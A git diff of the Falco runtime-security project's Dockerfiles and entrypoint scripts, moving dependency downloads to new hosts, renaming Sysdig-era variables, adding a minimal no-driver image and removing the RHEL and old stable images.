+if [[ -z "${SKIP_DRIVER_LOADER}" ]] && [[ -z "${SKIP_MODULE_LOAD}" ]]; then
+    echo "* Setting up /usr/src links from host"
+
+    for i in "$HOST_ROOT/usr/src"/*
+    do
+        base=$(basename "$i")
+        ln -s "$i" "/usr/src/$base"
+    done
+
+    /usr/bin/falco-driver-loader
+fi
+
+exec "$@"
--- a/docker/local/Dockerfile
+++ b/docker/local/Dockerfile
@@ -1,95 +1,94 @@
-FROM debian:unstable
+FROM debian:stable

 LABEL usage="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
-LABEL maintainer="opensource@sysdig.com"
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"

 ARG FALCO_VERSION=
 RUN test -n FALCO_VERSION
 ENV FALCO_VERSION ${FALCO_VERSION}

-ENV SYSDIG_HOST_ROOT /host
+ENV HOST_ROOT /host

 ENV HOME /root

 RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root

-ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
-
 RUN apt-get update \
-   && apt-get install -y --no-install-recommends \
-   bash-completion \
-   bc \
-   clang-7 \
-   ca-certificates \
-   curl \
-   dkms \
-   gnupg2 \
-   gcc \
-   jq \
-   libc6-dev \
-   libelf-dev \
-   llvm-7 \
-   netcat \
-   xz-utils \
-   libmpc3 \
-   binutils \
-   libgomp1 \
-   libitm1 \
-   libatomic1 \
-   liblsan0 \
-   libtsan0 \
-   libmpx2 \
-   libquadmath0 \
-   libcc1-0 \
-   && rm -rf /var/lib/apt/lists/*
+	&& apt-get install -y --no-install-recommends \
+	bash-completion \
+	bc \
+	clang-7 \
+	ca-certificates \
+	curl \
+	dkms \
+	gnupg2 \
+	gcc \
+	jq \
+	libc6-dev \
+	libelf-dev \
+	libyaml-0-2 \
+	llvm-7 \
+	netcat \
+	xz-utils \
+	libmpc3 \
+	binutils \
+	libgomp1 \
+	libitm1 \
+	libatomic1 \
+	liblsan0 \
+	libtsan0 \
+	libmpx2 \
+	libquadmath0 \
+	libcc1-0 \
+	&& rm -rf /var/lib/apt/lists/*

-# gcc 6 is no longer included in debian unstable, but we need it to
+# gcc 6 is no longer included in debian stable, but we need it to
 # build kernel modules on the default debian-based ami used by
 # kops. So grab copies we've saved from debian snapshots with the
 # prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
 # or so.

-RUN curl -o cpp-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/cpp-6_6.3.0-18_amd64.deb \
-    && curl -o gcc-6-base_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6-base_6.3.0-18_amd64.deb \
-    && curl -o gcc-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6_6.3.0-18_amd64.deb \
-    && curl -o libasan3_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libasan3_6.3.0-18_amd64.deb \
-    && curl -o libcilkrts5_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libcilkrts5_6.3.0-18_amd64.deb \
-    && curl -o libgcc-6-dev_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libgcc-6-dev_6.3.0-18_amd64.deb \
-    && curl -o libubsan0_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libubsan0_6.3.0-18_amd64.deb \
-    && curl -o libmpfr4_3.1.3-2_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libmpfr4_3.1.3-2_amd64.deb \
-    && curl -o libisl15_0.18-1_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libisl15_0.18-1_amd64.deb \
-    && dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
-    && rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
+RUN curl -L -o cpp-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-6_6.3.0-18_amd64.deb \
+	&& curl -L -o gcc-6-base_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6-base_6.3.0-18_amd64.deb \
+	&& curl -L -o gcc-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6_6.3.0-18_amd64.deb \
+	&& curl -L -o libasan3_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libasan3_6.3.0-18_amd64.deb \
+	&& curl -L -o libcilkrts5_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libcilkrts5_6.3.0-18_amd64.deb \
+	&& curl -L -o libgcc-6-dev_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-6-dev_6.3.0-18_amd64.deb \
+	&& curl -L -o libubsan0_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libubsan0_6.3.0-18_amd64.deb \
+	&& curl -L -o libmpfr4_3.1.3-2_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpfr4_3.1.3-2_amd64.deb \
+	&& curl -L -o libisl15_0.18-1_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-1_amd64.deb \
+	&& dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
+	&& rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb

-# gcc 5 is no longer included in debian unstable, but we need it to
+# gcc 5 is no longer included in debian stable, but we need it to
 # build centos kernels, which are 3.x based and explicitly want a gcc
 # version 3, 4, or 5 compiler. So grab copies we've saved from debian
 # snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.

-RUN curl -o cpp-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/cpp-5_5.5.0-12_amd64.deb \
- && curl -o gcc-5-base_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
- && curl -o gcc-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5_5.5.0-12_amd64.deb \
- && curl -o libasan2_5.5.0-12_amd64.deb	https://s3.amazonaws.com/download.draios.com/dependencies/libasan2_5.5.0-12_amd64.deb \
- && curl -o libgcc-5-dev_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
- && curl -o libisl15_0.18-4_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libisl15_0.18-4_amd64.deb \
- && curl -o libmpx0_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libmpx0_5.5.0-12_amd64.deb \
- && dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
- && rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
+RUN curl -L -o cpp-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-5_5.5.0-12_amd64.deb \
+	&& curl -L -o gcc-5-base_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
+	&& curl -L -o gcc-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5_5.5.0-12_amd64.deb \
+	&& curl -L -o libasan2_5.5.0-12_amd64.deb	https://dl.bintray.com/falcosecurity/dependencies/libasan2_5.5.0-12_amd64.deb \
+	&& curl -L -o libgcc-5-dev_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
+	&& curl -L -o libisl15_0.18-4_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-4_amd64.deb \
+	&& curl -L -o libmpx0_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpx0_5.5.0-12_amd64.deb \
+	&& dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
+	&& rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb

 # Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
 # default to gcc-5.
 RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc

 RUN rm -rf /usr/bin/clang \
- && rm -rf /usr/bin/llc \
- && ln -s /usr/bin/clang-7 /usr/bin/clang \
- && ln -s /usr/bin/llc-7 /usr/bin/llc
+	&& rm -rf /usr/bin/llc \
+	&& ln -s /usr/bin/clang-7 /usr/bin/clang \
+	&& ln -s /usr/bin/llc-7 /usr/bin/llc

 # Some base images have an empty /lib/modules by default
 # If it's not empty, docker build will fail instead of
 # silently overwriting the existing directory
 RUN rm -df /lib/modules \
- && ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
+	&& ln -s $HOST_ROOT/lib/modules /lib/modules

 ADD falco-${FALCO_VERSION}-x86_64.deb /
 RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb
@@ -97,17 +96,17 @@ RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb
 # Change the falco config within the container to enable ISO 8601
 # output.
 RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
- && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
+    && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml

-# debian:unstable head contains binutils 2.31, which generates
+# debian:stable head contains binutils 2.31, which generates
 # binaries that are incompatible with kernels < 4.16. So manually
 # forcibly install binutils 2.30-22 instead.
-RUN curl -s -o binutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils_2.30-22_amd64.deb \
- && curl -s -o libbinutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libbinutils_2.30-22_amd64.deb \
- && curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
- && curl -s -o binutils-common_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-common_2.30-22_amd64.deb \
- && dpkg -i *binutils*.deb \
- && rm -f *binutils*.deb
+RUN curl -L -o binutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils_2.30-22_amd64.deb \
+	&& curl -L -o libbinutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libbinutils_2.30-22_amd64.deb \
+	&& curl -L -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+	&& curl -L -o binutils-common_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-common_2.30-22_amd64.deb \
+	&& dpkg -i *binutils*.deb \
+	&& rm -f *binutils*.deb

 # The local container also copies some test trace files and
 # corresponding rules that are used when running regression tests.
--- a/docker/local/docker-entrypoint.sh
+++ b/docker/local/docker-entrypoint.sh
@@ -1,8 +1,7 @@
-#!/bin/bash
+#!/usr/bin/env bash
 #
-# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
+# Copyright (C) 2020 The Falco Authors.
 #
-# This file is part of falco.
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
 # you may not use this file except in compliance with the License.
@@ -17,19 +16,19 @@
 # limitations under the License.
 #

-#set -e

-# Set the SYSDIG_SKIP_LOAD variable to skip loading the sysdig kernel module
+# Set the SKIP_DRIVER_LOADER variable to skip loading the driver

-if [[ -z "${SYSDIG_SKIP_LOAD}" ]]; then
+if [[ -z "${SKIP_DRIVER_LOADER}" ]]; then
    echo "* Setting up /usr/src links from host"

-    for i in $(ls $SYSDIG_HOST_ROOT/usr/src)
+    for i in "$HOST_ROOT/usr/src"/*
    do
-        ln -s $SYSDIG_HOST_ROOT/usr/src/$i /usr/src/$i
+        base=$(basename "$i")
+        ln -s "$i" "/usr/src/$base"
    done

-    /usr/bin/falco-probe-loader
+    /usr/bin/falco-driver-loader
 fi

 exec "$@"
--- a/docker/no-driver/Dockerfile
+++ b/docker/no-driver/Dockerfile
@@ -0,0 +1,61 @@
+FROM ubuntu:18.04 as ubuntu
+
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+
+ARG FALCO_VERSION
+ARG VERSION_BUCKET=bin
+
+ENV FALCO_VERSION=${FALCO_VERSION}
+ENV VERSION_BUCKET=${VERSION_BUCKET}
+
+WORKDIR /
+
+ADD https://bintray.com/api/ui/download/falcosecurity/${VERSION_BUCKET}/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz /
+
+RUN apt-get update -y && \
+    apt-get install -y libyaml-0-2 binutils && \
+    tar -xvf falco-${FALCO_VERSION}-x86_64.tar.gz && \
+    rm -f falco-${FALCO_VERSION}-x86_64.tar.gz && \
+    mv falco-${FALCO_VERSION}-x86_64 falco && \
+    strip falco/usr/bin/falco && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/*
+
+RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /falco/etc/falco/falco.yaml > /falco/etc/falco/falco.yaml.new \
+    && mv /falco/etc/falco/falco.yaml.new /falco/etc/falco/falco.yaml
+
+FROM scratch
+
+COPY --from=ubuntu /lib/x86_64-linux-gnu/libanl.so.1 \
+    /lib/x86_64-linux-gnu/libc.so.6 \
+    /lib/x86_64-linux-gnu/libdl.so.2 \
+    /lib/x86_64-linux-gnu/libgcc_s.so.1 \
+    /lib/x86_64-linux-gnu/libm.so.6 \
+    /lib/x86_64-linux-gnu/libnsl.so.1 \
+    /lib/x86_64-linux-gnu/libnss_compat.so.2 \
+    /lib/x86_64-linux-gnu/libnss_files.so.2 \
+    /lib/x86_64-linux-gnu/libnss_nis.so.2 \
+    /lib/x86_64-linux-gnu/libpthread.so.0 \
+    /lib/x86_64-linux-gnu/librt.so.1 \
+    /lib/x86_64-linux-gnu/libz.so.1 \
+    /lib/x86_64-linux-gnu/
+
+COPY --from=ubuntu /usr/lib/x86_64-linux-gnu/libstdc++.so.6 \
+    /usr/lib/x86_64-linux-gnu/libstdc++.so.6
+
+COPY --from=ubuntu /usr/lib/x86_64-linux-gnu/libyaml-0.so.2.0.5 \
+    /usr/lib/x86_64-linux-gnu/libyaml-0.so.2
+
+COPY --from=ubuntu /etc/ld.so.cache \
+    /etc/nsswitch.conf \
+    /etc/ld.so.cache \
+    /etc/passwd \
+    /etc/group \
+    /etc/
+
+COPY --from=ubuntu /etc/default/nss /etc/default/nss
+COPY --from=ubuntu /lib64/ld-linux-x86-64.so.2 /lib64/ld-linux-x86-64.so.2
+
+COPY --from=ubuntu /falco /
+
+CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]
--- a/docker/rhel/Dockerfile
+++ b/docker/rhel/Dockerfile
@@ -1,38 +0,0 @@
-FROM registry.access.redhat.com/rhel7
-
-MAINTAINER Sysdig Support Team <support@sysdig.com>
-
-### Atomic/OpenShift Labels - https://github.com/projectatomic/ContainerApplicationGenericLabels
-LABEL name="falco" \
-      vendor="Sysdig" \
-      url="http://falco.org/" \
-      summary="Container Native runtime security" \
-      description="Falco is an open source project for intrusion and abnormality detection for Cloud Native platforms." \
-      run='docker run -d --name falco --restart always --privileged --net host --pid host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro -v /etc:/host/etc:ro --shm-size=350m registry.connect.redhat.com/sysdig/falco'
-
-COPY help.md /tmp/
-
-ENV SYSDIG_HOST_ROOT /host
-ENV HOME /root
-
-ADD http://download.draios.com/stable/rpm/draios.repo /etc/yum.repos.d/draios.repo
-RUN rpm --import https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public && \
-    rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm && \
-    yum clean all && \
-    REPOLIST=rhel-7-server-rpms,rhel-7-server-optional-rpms,epel,draios \
-    INSTALL_PKGS="gcc dkms kernel-devel kernel-headers python golang-github-cpuguy83-go-md2man falco" && \
-    yum -y update-minimal --disablerepo "*" --enablerepo ${REPOLIST} --setopt=tsflags=nodocs \
-      --security --sec-severity=Important --sec-severity=Critical && \
-    yum -y install --disablerepo "*" --enablerepo ${REPOLIST} --setopt=tsflags=nodocs ${INSTALL_PKGS} && \
-### help file markdown to man conversion
-    go-md2man -in /tmp/help.md -out /help.1 && \
-### we delete everything on /usr/src/kernels otherwise it messes up docker-entrypoint.sh
-    rm -fr /usr/src/kernels && \
-    rm -df /lib/modules && ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules && \
-    yum clean all
-
-COPY ./docker-entrypoint.sh /
-
-ENTRYPOINT ["/docker-entrypoint.sh"]
-
-CMD ["/usr/bin/falco"]
--- a/docker/rhel/help.md
+++ b/docker/rhel/help.md
@@ -1,15 +0,0 @@
-% falco (1) Container Image Pages
-% Falco Team
-% June, 2017
-
-# NAME
-falco \- Container Native runtime security
-
-# DESCRIPTION
-Falco is an open source project for intrusion and abnormality detection for Cloud Native platforms. See Falco website for more information: http://falco.org/
-
-# EXAMPLE
-    docker run -d --name falco --restart always --privileged --net host --pid host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro -v /etc:/host/etc:ro --shm-size=350m registry.connect.redhat.com/sysdig/falco
-
-# AUTHORS
-Falco Team
--- a/docker/stable/Dockerfile
+++ b/docker/stable/Dockerfile
@@ -1,109 +0,0 @@
-FROM debian:unstable
-
-LABEL maintainer="Sysdig <support@sysdig.com>"
-
-ENV FALCO_REPOSITORY stable
-
-LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
-
-ENV SYSDIG_HOST_ROOT /host
-
-ENV HOME /root
-
-RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
-
-ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
-
-RUN apt-get update \
- && apt-get install -y --no-install-recommends \
-	bash-completion \
-	bc \
-	clang-7 \
-	ca-certificates \
-	curl \
-	dkms \
-	gnupg2 \
-	gcc \
-	jq \
-	libc6-dev \
-	libelf-dev \
-	llvm-7 \
-	netcat \
-	xz-utils \
- && rm -rf /var/lib/apt/lists/*
-
-# gcc 6 is no longer included in debian unstable, but we need it to
-# build kernel modules on the default debian-based ami used by
-# kops. So grab copies we've saved from debian snapshots with the
-# prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
-# or so.
-
-RUN curl -o cpp-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/cpp-6_6.3.0-18_amd64.deb \
-    && curl -o gcc-6-base_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6-base_6.3.0-18_amd64.deb \
-    && curl -o gcc-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6_6.3.0-18_amd64.deb \
-    && curl -o libasan3_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libasan3_6.3.0-18_amd64.deb \
-    && curl -o libcilkrts5_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libcilkrts5_6.3.0-18_amd64.deb \
-    && curl -o libgcc-6-dev_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libgcc-6-dev_6.3.0-18_amd64.deb \
-    && curl -o libubsan0_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libubsan0_6.3.0-18_amd64.deb \
-    && curl -o libmpfr4_3.1.3-2_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libmpfr4_3.1.3-2_amd64.deb \
-    && curl -o libisl15_0.18-1_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libisl15_0.18-1_amd64.deb \
-    && dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
-    && rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
-
-# gcc 5 is no longer included in debian unstable, but we need it to
-# build centos kernels, which are 3.x based and explicitly want a gcc
-# version 3, 4, or 5 compiler. So grab copies we've saved from debian
-# snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.
-
-RUN curl -o cpp-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/cpp-5_5.5.0-12_amd64.deb \
- && curl -o gcc-5-base_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
- && curl -o gcc-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5_5.5.0-12_amd64.deb \
- && curl -o libasan2_5.5.0-12_amd64.deb	https://s3.amazonaws.com/download.draios.com/dependencies/libasan2_5.5.0-12_amd64.deb \
- && curl -o libgcc-5-dev_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
- && curl -o libisl15_0.18-4_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libisl15_0.18-4_amd64.deb \
- && curl -o libmpx0_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libmpx0_5.5.0-12_amd64.deb \
- && dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
- && rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
-
-# Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
-# default to gcc-5.
-RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
-
-RUN rm -rf /usr/bin/clang \
- && rm -rf /usr/bin/llc \
- && ln -s /usr/bin/clang-7 /usr/bin/clang \
- && ln -s /usr/bin/llc-7 /usr/bin/llc
-
-RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
- && curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
- && apt-get update \
- && apt-get install -y --no-install-recommends falco \
- && apt-get clean \
- && rm -rf /var/lib/apt/lists/*
-
-# Change the falco config within the container to enable ISO 8601
-# output.
-RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
- && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
-
-# Some base images have an empty /lib/modules by default
-# If it's not empty, docker build will fail instead of
-# silently overwriting the existing directory
-RUN rm -df /lib/modules \
- && ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
-
-# debian:unstable head contains binutils 2.31, which generates
-# binaries that are incompatible with kernels < 4.16. So manually
-# forcibly install binutils 2.30-22 instead.
-RUN curl -s -o binutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils_2.30-22_amd64.deb \
- && curl -s -o libbinutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libbinutils_2.30-22_amd64.deb \
- && curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
- && curl -s -o binutils-common_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-common_2.30-22_amd64.deb \
- && dpkg -i *binutils*.deb \
- && rm -f *binutils*.deb
-
-COPY ./docker-entrypoint.sh /
-
-ENTRYPOINT ["/docker-entrypoint.sh"]
-
-CMD ["/usr/bin/falco"]
--- a/docker/stable/docker-entrypoint.sh
+++ b/docker/stable/docker-entrypoint.sh
@@ -1,35 +0,0 @@
-#!/bin/bash
-#
-# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
-#
-# This file is part of falco.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-
-#set -e
-
-# Set the SYSDIG_SKIP_LOAD variable to skip loading the sysdig kernel module
-
-if [[ -z "${SYSDIG_SKIP_LOAD}" ]]; then
-    echo "* Setting up /usr/src links from host"
-
-    for i in $(ls $SYSDIG_HOST_ROOT/usr/src)
-    do
-        ln -s $SYSDIG_HOST_ROOT/usr/src/$i /usr/src/$i
-    done
-
-    /usr/bin/falco-probe-loader
-fi
-
-exec "$@"
--- a/docker/tester/Dockerfile
+++ b/docker/tester/Dockerfile
@@ -1,16 +1,22 @@
-FROM fedora:28
+FROM fedora:31

 LABEL name="falcosecurity/falco-tester"
-LABEL usage="docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build -e FALCO_VERSION=<current_falco_version> --name <name> falcosecurity/falco-tester test"
-LABEL maintainer="opensource@sysdig.com"
+LABEL usage="docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build --name <name> falcosecurity/falco-tester test"
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"

 ENV FALCO_VERSION=
 ENV BUILD_TYPE=release

-RUN curl https://avocado-project.org/data/repos/avocado-fedora.repo -o /etc/yum.repos.d/avocado.repo && \
-    dnf install -y docker findutils jq unzip python2-avocado python2-avocado-plugins-varianter-yaml-to-mux && dnf clean all
